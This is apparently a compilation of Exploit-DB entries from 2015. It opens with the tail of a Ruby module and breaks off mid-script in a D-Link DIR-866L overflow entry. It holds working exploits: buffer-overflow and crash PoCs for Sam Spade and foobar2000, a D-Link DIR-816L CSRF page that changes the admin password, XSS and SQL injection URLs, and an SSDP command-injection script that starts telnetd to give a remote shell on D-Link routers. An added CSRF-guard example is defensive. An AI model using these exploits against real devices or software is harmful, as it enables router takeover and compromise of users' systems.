        }
      )
    else
      print_error('Cookie not found')
    end
  end
end
-
Sam Spade 1.14 - Browse URL Buffer Overflow (PoC)
#!/usr/bin/env python
# Exploit Title : Sam Spade 1.14 Browse URL Buffer Overflow PoC
# Discovery by : Nipun Jaswal
# Email : mail@nipunjaswal.info
# Discovery Date : 14/11/2015
# Vendor Homepage : http://samspade.org
# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version : 1.14
# Vulnerability Type: Denial of Service / Proof Of Concept / EIP Overwrite
# Tested on OS : Windows 7 Home Basic
# Crash Point : Go to Tools > Browse Web > Enter the contents of 'sam_spade_browse_url.txt' > OK
# Note: Do Not Remove the http://
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# And the Stack
#0012F73C 41414141 AAAA
#0012F740 41414141 AAAA
#0012F744 DEADBEAF ¯¾Þ
# Registers
#EAX 00000001
#ECX 00000001
#EDX 00000030
#EBX 00000000
#ESP 0012F74C
#EBP 41414141
#ESI 008DA260
#EDI 0176F4E0
#EIP DEADBEAF

# Written in binary mode with byte strings so the four raw bytes reach the
# file unchanged under both Python 2 and Python 3.
f = open("sam_spade_browse_url.txt", "wb")
Junk = b"A" * 496
eip_overwrite = b"\xaf\xbe\xad\xde"  # 0xDEADBEAF, little-endian
f.write(Junk + eip_overwrite)
f.close()
-
VideoLAN VLC Media Player Web Interface 2.2.1 - Metadata Title Cross-Site Scripting
##################################
# Andrea Sindoni - @invictus1306 #
##################################

XSS vulnerability via metadata

1. Introduction

Affected Product: VLC 2.2.1 / WEB INTERFACE
Vulnerability Type: XSS

2. Vulnerability Description

XSS vulnerability via metadata title

3. Proof of Concept

3.1 Launch:
    vlc.exe --http-host=127.0.0.1 --http-port=8080 --http-password=andrea
3.2 Open a browser and go to localhost:8080 (for more info see https://wiki.videolan.org/Documentation:Modules/http_intf/)
3.3 Leave the username blank and use the password andrea
3.4 Select the poc.mp3 (attached) file
3.5 See the attached image

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38706.zip
-
D-Link DIR-816L Wireless Router - Cross-Site Request Forgery
----------------------------------------------------------------------------------------------
Title:
====
D-link wireless router DIR-816L – Cross-Site Request Forgery (CSRF) vulnerability

Credit:
======
Name: Bhadresh Patel
Company/affiliation: HelpAG
Website: www.helpag.com

CVE:
=====
CVE-2015-5999

Date:
====
10-11-2015 (dd/mm/yyyy)

Vendor:
======
D-Link is a computer networking company with relatively modest beginnings in Taiwan. The company has grown over the last 25 years into an exciting global brand offering the most up-to-date network solutions. Whether it is to suit the needs of the home consumer, a business or service provider, D-Link takes pride in offering award-winning networking products and services.

Product:
=======
DIR-816L is a wireless AC750 Dual Band Cloud Router
Product link: http://support.dlink.com/ProductInfo.aspx?m=DIR-816L

Abstract:
=======
A Cross-Site Request Forgery (CSRF) vulnerability in the DIR-816L wireless router enables an attacker to perform an unwanted action on the wireless router on behalf of a user/admin who is currently authenticated to it.

Report-Timeline:
============
27-07-2015: Vendor notification
27-07-2015: Vendor Response/Feedback
05-11-2015: Vendor Fix/Patch
10-11-2015: Public or Non-Public Disclosure

Affected Version:
=============
<=2.06.B01

Exploitation-Technique:
===================
Remote

Severity Rating:
===================
7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)

Details:
=======
An attacker who lures a DIR-816L authenticated user to browse a malicious website can exploit cross-site request forgery (CSRF) to submit commands to the DIR-816L wireless router and gain control of the product. The attacker could submit a variety of commands including but not limited to changing the admin account password, changing the network policy, etc.

Proof Of Concept:
================
1) User logs in to the DIR-816L wireless router
2) User visits the attacker's malicious web page (attacker.html)
3) attacker.html exploits the CSRF vulnerability and changes the admin account password

PoC video link: http://youtu.be/UBdR2sUc8Wg

Exploit code (attacker.html):

<html>
<body>
<iframe style="display:none" name="hiddenpost"></iframe>
<form action="http://192.168.0.1/hedwig.cgi" method="POST" enctype="text/plain" target="hiddenpost" id="csrf">
<input type="hidden" name="<?xml version" value=""1.0" encoding="UTF-8"?>
<postxml>
<module>
	<service>DEVICE.ACCOUNT</service>
	<device>
		<gw_name>DIR-816L</gw_name>
		<account>
			<seqno>1</seqno>
			<max>2</max>
			<count>1</count>
			<entry>
				<uid>USR-</uid>
				<name>Admin</name>
				<usrid/>
				<password>password</password>
				<group>0</group>
				<description/>
			</entry>
		</account>
		<group>
			<seqno/>
			<max/>
			<count>0</count>
		</group>
		<session>
			<captcha>1</captcha>
			<dummy/>
			<timeout>180</timeout>
			<maxsession>128</maxsession>
			<maxauthorized>16</maxauthorized>
		</session>
	</device>
</module>
<module>
	<service>HTTP.WAN-1</service>
	<inf>
		<web></web>
		<https_rport></https_rport>
		<stunnel>1</stunnel>
		<weballow>
			<hostv4ip/>
		</weballow>
		<inbfilter/>
	</inf>
</module>
<module>
	<service>HTTP.WAN-2</service>
	<inf>
		<active>0</active>
		<nat>NAT-1</nat>
		<web/>
		<weballow>
			<hostv4ip/>
		</weballow>
	</inf>
</module>
<module>
	<service>INBFILTER</service>
	<acl>
		<inbfilter>
			<seqno>1</seqno>
			<max>24</max>
			<count>0</count>
		</inbfilter>
	</acl>
	<ACTIVATE>ignore</ACTIVATE>
	<FATLADY>ignore</FATLADY>
	<SETCFG>ignore</SETCFG>
</module>
<module>
	<service>SHAREPORT</service>
	<FATLADY>ignore</FATLADY>
	<ACTIVATE>ignore</ACTIVATE>
</module>
<module>
	<service>SAMBA</service>
	<samba>
		<enable>1</enable>
		<auth>1</auth>
	</samba>
</module>
</postxml>" />
</form>
<script>alert("This is CSRF PoC");document.getElementById("csrf").submit()</script>
<iframe style="display:none" name="hiddencommit"></iframe>
<form action="http://192.168.0.1/pigwidgeon.cgi" method="POST" target="hiddencommit" id="csrf1">
<input type="hidden" name="ACTIONS" value="SETCFG,SAVE,ACTIVATE" />
</form>
<script>document.getElementById("csrf1").submit()</script>
</body>
</html>

Patched/Fixed Firmware and notes:
==========================
2.06.B09_BETA -- ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_2.06.B09_BETA.ZIP
2.06.B09_BETA -- ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_NOTES_2.06.B09_BETA_EN.PDF

Credits:
=======
Bhadresh Patel
Senior Security Analyst
HelpAG (www.helpag.com)
----------------------------------------------------------------------------------------------
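The PoC works because hedwig.cgi and pigwidgeon.cgi accept a config-changing POST from any page the browser happens to be on. The following is an added example, not code from the advisory or from D-Link, of a request guard the firmware could apply to those two endpoints: it requires the Origin (or Referer) to be the router itself and a per-session token that a cross-site form cannot supply. The Request class, the endpoint set and the sample requests are constructed for the demonstration; the legitimate UI is assumed to embed the token in its own pages.

```python
from dataclasses import dataclass, field
import hmac
import secrets
from urllib.parse import urlsplit

# Origin of the router's management UI, as it appears in the advisory's PoC.
ROUTER_ORIGIN = "http://192.168.0.1"
# The two endpoints attacker.html drives: hedwig.cgi stages the XML, pigwidgeon.cgi commits it.
STATE_CHANGING = {"/hedwig.cgi", "/pigwidgeon.cgi"}


@dataclass
class Request:
    """Minimal stand-in for what the CGI sees (constructed for this example)."""
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)

    def header(self, name: str):
        name = name.lower()  # header names are case-insensitive
        for key, value in self.headers.items():
            if key.lower() == name:
                return value
        return None


def new_session_token() -> str:
    """Per-session secret that the legitimate UI embeds in its own pages."""
    return secrets.token_urlsafe(32)


def request_origin(req: Request):
    """Origin header, or the scheme://host of the Referer when Origin is absent."""
    origin = req.header("Origin")
    if origin:
        return origin
    referer = req.header("Referer")
    if referer:
        parts = urlsplit(referer)
        if parts.scheme and parts.netloc:
            return f"{parts.scheme}://{parts.netloc}"
    return None


def csrf_guard(req: Request, session_token: str):
    """Decide whether a request may reach a config-changing endpoint.

    Returns (allowed, reason). Both checks are independent, and the cross-site
    form in attacker.html fails both: the browser stamps a foreign Origin or
    Referer on it, and it cannot carry a token it never saw.
    """
    if req.method != "POST" or req.path not in STATE_CHANGING:
        return True, "not a state-changing request"

    origin = request_origin(req)
    if origin is None:
        return False, "no Origin or Referer header"
    if origin.lower() != ROUTER_ORIGIN:
        return False, f"cross-site origin {origin}"

    supplied = req.header("X-CSRF-Token") or req.form.get("csrf_token") or ""
    # Constant-time comparison; an empty or stale token fails here.
    if not hmac.compare_digest(supplied.encode(), session_token.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"


# Constructed requests mirroring the PoC: a text/plain form post of the XML to
# hedwig.cgi, then the ACTIONS commit to pigwidgeon.cgi, both sent from attacker.html.
POC_STAGE = Request("POST", "/hedwig.cgi",
                    {"Origin": "http://attacker.example", "Content-Type": "text/plain"})
POC_COMMIT = Request("POST", "/pigwidgeon.cgi",
                     {"Referer": "http://attacker.example/attacker.html"},
                     {"ACTIONS": "SETCFG,SAVE,ACTIVATE"})


if __name__ == "__main__":
    token = new_session_token()
    for req in (POC_STAGE, POC_COMMIT):
        print(req.path, csrf_guard(req, token))
    legit = Request("POST", "/pigwidgeon.cgi",
                    {"Origin": ROUTER_ORIGIN, "X-CSRF-Token": token},
                    {"ACTIONS": "SETCFG,SAVE,ACTIVATE"})
    print(legit.path, csrf_guard(legit, token))
```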
-
foobar2000 1.3.9 - '.pls' / '.m3u' / '.m3u8' Local Crash (PoC)
# Exploit Title: foobar2000 1.3.9 (.pls; .m3u; .m3u8) Local Crash PoC
# Date: 11-15-2015
# Exploit Author: Antonio Z.
# Vendor Homepage: http://www.foobar2000.org/
# Software Link: http://www.foobar2000.org/getfile/036be51abc909653ad44d664f0ce3668/foobar2000_v1.3.9.exe
# Version: 1.3.9
# Tested on: Windows XP SP3, Windows 7 SP1 x86, Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64

# Byte strings throughout, so the binary-mode writes work under Python 2 and 3.
evil = b'\x41' * 256

pls = (b'[playlist]\n'
       + b'NumberOfEntries=1\n'
       + b'File1=http://' + evil + b'\n'
       + b'Title1=\n'
       + b'Length1=-1\n')
m3u = b'http://' + evil
m3u8 = b'http://' + evil

file = open('Local_Crash_PoC.pls', 'wb')
file.write(pls)
file.close()

file = open('Local_Crash_PoC.m3u', 'wb')
file.write(m3u)
file.close()

file = open('Local_Crash_PoC.m3u8', 'wb')
file.write(m3u8)
file.close()
-
MCImageManager - Multiple Vulnerabilities
source: https://www.securityfocus.com/bid/61825/info

MCImageManager is prone to multiple security vulnerabilities. An attacker may exploit these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, manipulate the page and spoof content to misguide users, and disclose or modify sensitive information. Other attacks may also be possible.

MCImageManager 3.1.5 and prior versions are vulnerable.

http://www.example.com/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv
http://www.example.com/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?autoStart=false&startImage=1.jpg
http://www.example.com/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv&autoStart=false&startImage=1.jpg
http://www.example.com/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.xml

File 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>

<html>
<body>
<script>
function flvStart() { alert('XSS'); }
function flvEnd() { alert('XSS'); }
</script>
<object width="50%" height="50%">
<param name=movie value="flvPlayer.swf">
<param name=quality value=high>
<embed src="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.example1.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>
-
foobar2000 1.3.9 - '.asx' Local Crash (PoC)
# Exploit Title: foobar2000 1.3.9 (.asx) Local Crash PoC
# Date: 11-15-2015
# Exploit Author: Antonio Z.
# Vendor Homepage: http://www.foobar2000.org/
# Software Link: http://www.foobar2000.org/getfile/036be51abc909653ad44d664f0ce3668/foobar2000_v1.3.9.exe
# Version: 1.3.9
# Tested on: Windows XP SP3, Windows 7 SP1 x86, Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64
# Instructions: Create playlist.asx:
# <asx version="3.0">
#   <title>Example.com Live Stream</title>
#
#   <entry>
#     <title>Short Announcement to Play Before Main Stream</title>
#     <ref href="http://example.com/announcement.wma" />
#     <param name="aParameterName" value="aParameterValue" />
#   </entry>
#
#   <entry>
#     <title>Example radio</title>
#     <ref href="http://example.com" />
#     <author>Example.com</author>
#     <copyright>example.com</copyright>
#   </entry>
# </asx>

import shutil

evil = 'A' * 256

# Copy the template playlist, then replace the second <ref> with the long URL.
shutil.copy('playlist.asx', 'Local_Crash_PoC.asx')

file = open('Local_Crash_PoC.asx', 'r')
file_data = file.read()
file.close()

file_new_data = file_data.replace('<ref href="http://example.com" />',
                                  '<ref href="http://' + evil + '" />')

file = open('Local_Crash_PoC.asx', 'w')
file.write(file_new_data)
file.close()
-
Bo-Blog 2.1.1 - Cross-Site Scripting / SQL Injection
source: https://www.securityfocus.com/bid/61880/info

Bo-Blog is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.

Attackers can exploit these issues to execute arbitrary code in the context of the browser, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; other attacks are also possible.

Bo-Blog 2.1.1 is vulnerable; other versions may also be affected.

http://www.example.com//view.php?go=userlist&ordered=1%27 [SQLi]
http://www.example.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E [XSS]
http://www.example.com//view.php?go=userlist&ordered=1&usergroup="/><script>alert(1);</script> [XSS]
-
Microsoft Windows Kernel - 'win32k.sys' Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)
Source: https://code.google.com/p/google-security-research/issues/detail?id=507

We have observed a number of Windows kernel crashes in the win32k.sys driver while processing corrupted TTF font files. An example of a crash log excerpt generated after triggering the bug is shown below:

---
DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: fffff900c49ab000, memory referenced
Arg2: 0000000000000001, value 0 = read operation, 1 = write operation
Arg3: fffff96000324c14, if non-zero, the address which referenced memory.
Arg4: 0000000000000000, (reserved)

[...]

FAULTING_IP:
win32k!or_all_N_wide_rotated_need_last+70
fffff960`00324c14 410802          or      byte ptr [r10],al

MM_INTERNAL_CODE:  0

DEFAULT_BUCKET_ID:  VISTA_DRIVER_FAULT

BUGCHECK_STR:  0xD6

CURRENT_IRQL:  0

TRAP_FRAME:  fffff88007531690 -- (.trap 0xfffff88007531690)
.trap 0xfffff88007531690
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=fffff880075318ff rbx=0000000000000000 rcx=0000000000000007
rdx=00000000000000ff rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000324c14 rsp=fffff88007531820 rbp=fffffffffffffff5
 r8=00000000ffffffff  r9=fffff900c1b48995 r10=fffff900c49ab000
r11=0000000000000007 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na po nc
win32k!or_all_N_wide_rotated_need_last+0x70:
fffff960`00324c14 410802          or      byte ptr [r10],al ds:0b08:fffff900`c49ab000=??
.trap
Resetting default scope

LAST_CONTROL_TRANSFER:  from fffff8000294a017 to fffff800028cd5c0

STACK_TEXT:
fffff880`07531528 fffff800`0294a017 : 00000000`00000050 fffff900`c49ab000 00000000`00000001 fffff880`07531690 : nt!KeBugCheckEx
fffff880`07531530 fffff800`028cb6ee : 00000000`00000001 fffff900`c49ab000 fffff900`c4211000 fffff900`c49ab002 : nt! ?? ::FNODOBFM::`string'+0x4174f
fffff880`07531690 fffff960`00324c14 : 00000000`0000001f fffff960`000b8f1f fffff900`c4ed2f08 00000000`0000001f : nt!KiPageFault+0x16e
fffff880`07531820 fffff960`000b8f1f : fffff900`c4ed2f08 00000000`0000001f 00000000`00000002 00000000`00000007 : win32k!or_all_N_wide_rotated_need_last+0x70
fffff880`07531830 fffff960`000eba0d : 00000000`00000000 fffff880`07532780 00000000`00000000 00000000`0000000a : win32k!draw_nf_ntb_o_to_temp_start+0x10f
fffff880`07531890 fffff960`000c5ab8 : 00000000`00000000 fffff900`c49aad60 fffff900`c4ed2ed0 00000000`00ffffff : win32k!vExpandAndCopyText+0x1c5
fffff880`07531c30 fffff960`00874b4b : fffff900`0000000a fffff880`00000002 fffff900`c4484ca0 fffff880`07532368 : win32k!EngTextOut+0xe54
fffff880`07531fc0 fffff900`0000000a : fffff880`00000002 fffff900`c4484ca0 fffff880`07532368 00000000`00000000 : VBoxDisp+0x4b4b
fffff880`07531fc8 fffff880`00000002 : fffff900`c4484ca0 fffff880`07532368 00000000`00000000 fffff880`07532110 : 0xfffff900`0000000a
fffff880`07531fd0 fffff900`c4484ca0 : fffff880`07532368 00000000`00000000 fffff880`07532110 fffff900`c49b6d58 : 0xfffff880`00000002
fffff880`07531fd8 fffff880`07532368 : 00000000`00000000 fffff880`07532110 fffff900`c49b6d58 fffff900`c49b6de8 : 0xfffff900`c4484ca0
fffff880`07531fe0 00000000`00000000 : fffff880`07532110 fffff900`c49b6d58 fffff900`c49b6de8 fffff900`c49b6c30 : 0xfffff880`07532368
---

While the above is only one example, we have seen the issue manifest itself in a variety of ways: either by crashing while trying to write beyond a pool allocation in the win32k!or_all_4_wide_rotated_need_last, win32k!or_all_N_wide_rotated_need_last, win32k!or_all_N_wide_rotated_no_last or win32k!or_all_N_wide_unrotated functions, or in other locations in the kernel due to system instability caused by pool corruption. In all cases, the crash occurs somewhere below a win32k!EngTextOut function call, i.e. it is triggered while trying to display the glyphs of a malformed TTF on the screen, rather than while loading the font in the system.

We believe the condition to be a pool-based buffer overflow triggered by one of the above win32k.sys functions, with a binary -or- operation being performed on bytes outside a pool allocation. This is also confirmed by the fact that various system bugchecks we have observed are a consequence of the kernel trying to dereference addresses with too many bits set, e.g.:

---
rax=fffff91fc29b4c60 rbx=0000000000000000 rcx=fffff900c4ede320
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000271f6a rsp=fffff880035b8bd0 rbp=fffff880035b9780
 r8=000000000000021d  r9=fffff900c4edf000 r10=fffff880056253f4
r11=fffff900c4902eb0 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na po nc
win32k!PopThreadGuardedObject+0x16:
fffff960`00271f6a 4c8918          mov     qword ptr [rax],r11 ds:0030:fffff91f`c29b4c60=????????????????
---

While we have not determined the specific root cause of the vulnerability, the proof-of-concept TTF files triggering the bug were created by taking legitimate fonts and replacing the glyph TrueType programs with ones generated by a dedicated generator. Therefore, the problem is almost certainly caused by some part of the arbitrary TrueType programs.

The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (typically leading to an immediate crash in one of the aforementioned functions when the overflow takes place), but it is also possible to observe a system crash on a default Windows installation as a consequence of pool corruption and resulting system instability. In order to reproduce the problem with the provided samples, it is necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with several proof-of-concept TTF files, together with corresponding kernel crash logs from Windows 7 64-bit.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38713.zip
-
Microsoft Windows Kernel - 'win32k.sys' Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)
Source: https://code.google.com/p/google-security-research/issues/detail?id=506

We have encountered a number of Windows kernel crashes in the win32k.sys driver while processing a specific corrupted TTF font file. The cleanest stack trace we have acquired, which might also indicate where the pool corruption takes place and/or the root cause of the vulnerability, is shown below:

```text
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: fffff900c4c31000, memory referenced.
Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.
Arg3: fffff96000156a34, If non-zero, the instruction address which referenced the bad memory address.
Arg4: 0000000000000000, (reserved)

[...]

FAULTING_IP:
win32k!memmove+64
fffff960`00156a34 488901          mov     qword ptr [rcx],rax

MM_INTERNAL_CODE:  0

DEFAULT_BUCKET_ID:  VISTA_DRIVER_FAULT

BUGCHECK_STR:  0x50

CURRENT_IRQL:  0

TRAP_FRAME:  fffff880074a0210 -- (.trap 0xfffff880074a0210)
.trap 0xfffff880074a0210
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=fffff47cffffe440 rbx=0000000000000000 rcx=fffff900c4c31000
rdx=000000000141f518 rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000156a34 rsp=fffff880074a03a8 rbp=0000000000000010
 r8=0000000000000018  r9=0000000000000001 r10=fffff900c4c211a8
r11=fffff900c4c30ff0 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na pe nc
win32k!memmove+0x64:
fffff960`00156a34 488901          mov     qword ptr [rcx],rax ds:a020:fffff900`c4c31000=????????????????
.trap
Resetting default scope

LAST_CONTROL_TRANSFER:  from fffff800028fa017 to fffff8000287d5c0

STACK_TEXT:
fffff880`074a00a8 fffff800`028fa017 : 00000000`00000050 fffff900`c4c31000 00000000`00000001 fffff880`074a0210 : nt!KeBugCheckEx
fffff880`074a00b0 fffff800`0287b6ee : 00000000`00000001 fffff900`c4c31000 fffff880`074a0400 fffff900`c4c30fd8 : nt! ?? ::FNODOBFM::`string'+0x4174f
fffff880`074a0210 fffff960`00156a34 : fffff960`00252e40 fffff900`c4c30f98 00000000`00000003 fffff900`c48f2eb0 : nt!KiPageFault+0x16e
fffff880`074a03a8 fffff960`00252e40 : fffff900`c4c30f98 00000000`00000003 fffff900`c48f2eb0 fffff960`002525dc : win32k!memmove+0x64
fffff880`074a03b0 fffff960`0031d38e : 00000000`000028a6 fffff900`c4c30fd8 00000000`00000000 fffff900`c4c21008 : win32k!EPATHOBJ::bClone+0x138
fffff880`074a0400 fffff960`000f07bb : fffff880`00002640 fffff900`c576aca0 00000000`00002640 fffff880`00000641 : win32k!RFONTOBJ::bInsertMetricsPlusPath+0x17e
fffff880`074a0540 fffff960`000eccf7 : fffff880`074a2640 fffff880`074a0a68 fffff880`074a0b40 fffff800`00000641 : win32k!xInsertMetricsPlusRFONTOBJ+0xe3
fffff880`074a0610 fffff960`000ec998 : fffff880`074a0b40 fffff880`074a0a68 fffff900`c0480014 00000000`00000179 : win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x1f7
fffff880`074a0690 fffff960`000ec390 : fffff980`00000000 fffff880`074a0830 fffff900`c04a8000 fffff800`00000008 : win32k!ESTROBJ::vCharPos_H3+0x168
fffff880`074a0710 fffff960`000ed841 : 00000000`41800000 00000000`00000000 00000000`0000000a fffff880`074a0830 : win32k!ESTROBJ::vInit+0x350
fffff880`074a07a0 fffff960`000ed4ef : fffff880`074a0ca0 fffff900`c576aca0 ffffd08c`00000020 ffffffff`ffffffff : win32k!GreGetTextExtentExW+0x275
fffff880`074a0a60 fffff800`0287c853 : 00000000`00000000 fffff880`074a0ca0 00000000`00000001 fffff880`00000000 : win32k!NtGdiGetTextExtentExW+0x237
fffff880`074a0bb0 00000000`750a213a : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x13
00000000`0025e1c8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x750a213a
```

We have also observed a number of other system bugchecks caused by the particular TTF file with various stack traces indicating a pool corruption condition. For example, on Windows 7 32-bit a crash occurs only while deleting the font, under the following call stack:

```text
9823bc7c 90d8dec1 fb634cf0 fb60ecf0 00000001 win32k!RFONTOBJ::vDeleteCache+0x56
9823bca8 90d14209 00000000 00000000 00000001 win32k!RFONTOBJ::vDeleteRFONT+0x190
9823bcd0 90d15e00 9823bcf4 fb62ccf0 00000000 win32k!PUBLIC_PFTOBJ::bLoadFonts+0x6fb
9823bd00 90ddf48e 00000008 fbc16ff8 912f8fc8 win32k!PFTOBJ::bUnloadWorkhorse+0x114
9823bd28 8267ea06 13000117 0040fa24 775e71b4 win32k!GreRemoveFontMemResourceEx+0x60
9823bd28 775e71b4 13000117 0040fa24 775e71b4 nt!KiSystemServicePostCall
```

While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "OS/2" table. The issue reproduces on Windows 7 (32 and 64-bit). It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it is also possible to observe a system crash on a default Windows installation as a consequence of pool corruption and resulting system instability. In order to reproduce the problem with the provided sample, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes. Attached is an archive with the proof-of-concept mutated TTF file, together with the original font used to generate it and a corresponding kernel crash log from Windows 7 64-bit.

Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38714.zip
-
D-Link DIR-815 / DIR-850L - SSDP Command Injection
## Advisory Information

Title: SSDP command injection using UDP for a lot of Dlink routers including DIR-815, DIR-850L
Vendors contacted: William Brown <william.brown@dlink.com> (Dlink)
Release mode: Released
CVE: None
Note: All these security issues have been discussed with the vendor and the vendor indicated that they have fixed the issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has now taken the security advisory pages down, and hence the information needs to be publicly accessible so that users of these devices can update the router firmware. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.

## Product Description

Many Dlink routers affected. Tested on DIR-815.

## Vulnerabilities Summary

DIR-815, DIR-850L and most other Dlink routers are susceptible to this flaw. It allows command injection using SSDP packets over UDP, so no authentication is required. The attacker only needs to be on the wireless LAN, or be able to fake a request coming from the internal wireless LAN using some other mechanism.

## Details

Command injection

```python
# Python 2 proof of concept
import socket
import struct

# This vulnerability is pretty much in every router that has cgibin and uses SSDP code in that cgibin.
# This one worked on the device dir-815.
# Will work only in WLAN
buf = 'M-SEARCH * HTTP/1.1\r\nHOST:239.255.255.250:1900\r\nST:urn:schemas-upnp-org:service:WANIPConnection:1;telnetd -p 9094;ls\r\nMX:2\r\nMAN:"ssdp:discover"\r\n\r\n'
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("239.255.255.250", 1900))
s.send(buf)
s.close()
```

## Report Timeline

* Jan 22, 2015: Vulnerability found by Samuel Huntley and reported to William Brown.
* Feb 15, 2015: Vulnerability is patched by Dlink.
* Nov 13, 2015: A public advisory is sent to security mailing lists.

## Credit

This vulnerability was found by Samuel Huntley
-
D-Link DIR-866L - Multiple Buffer Overflow Vulnerabilities
## Advisory Information

Title: DIR-866L Buffer overflows in HNAP and send email functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com (Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and the vendor indicated that they have fixed the issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has now taken the security advisory pages down, and hence the information needs to be publicly accessible so that users of these devices can update the router firmware. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.

## Product Description

DIR866L -- AC1750 Wi-Fi Router. Mainly used by home and small offices.

## Vulnerabilities Summary

Have come across 2 security issues in DIR866L firmware which allow an attacker on the wireless LAN to exploit buffer overflow vulnerabilities in the HNAP and send email functionalities. To exploit the HNAP vulnerability an attacker needs to be on the wireless LAN, or the management interface needs to be exposed on the Internet, but it requires no authentication. The send email buffer overflow does require the attacker to be on the wireless LAN, or to trick the administrator into exploiting it using XSRF.

## Details

HNAP buffer overflow

```python
# Python 2 proof of concept
import socket
import struct
import string
import sys

BUFFER_SIZE = 2048

# Observe this in a emulator/debugger or real device/debugger
